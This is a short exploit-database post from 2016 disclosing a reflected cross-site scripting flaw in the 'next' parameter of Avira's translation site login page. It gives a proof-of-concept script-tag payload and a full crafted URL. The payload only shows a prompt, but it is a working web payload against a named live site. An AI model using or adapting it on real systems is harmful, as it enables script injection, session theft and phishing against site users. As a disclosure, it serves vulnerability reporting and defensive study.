Home / os / winmobile

Avira Cross Site Scripting

Posted on 31 January 2016

# Exploit Title: AVIRA Subdomain XSS Vulnerability
# Google Dork: N/A
# Date: 2016/1/29
# Exploit Author: RootByte
# Vendor Homepage: http://translate.avira.com
# Software Link: N/A
# Version: N/A
# Tested on: Windows 10 / FireFox
# CVE : N/A

~ # Vulnerable Location: http://translate.avira.com/accounts/login/

~ # Variable: next

~ # Using this script for XSS Vunerability Testing :
"><script>prompt(/RootByte/)</script>

~ # Our Finally address is
http://translate.avira.com/accounts/login/?csrfmiddlewaretoken=Ukv77qZZeG2BavIGaHNxcgJ6U4045erd&username=3383976&password=5478964&login=Login&language=ach&next="><script>prompt(/RootByte/)</script>

# Discovered by: RootByte
# Page: https://www.facebook.com/Rootbyte/
# Contact: https://www.facebook.com/groups/RootByte/

InfoSec Consultant / Web Pentester / Wannabe Security Researcher / JDM interested and Tacos addicted.

 

TOP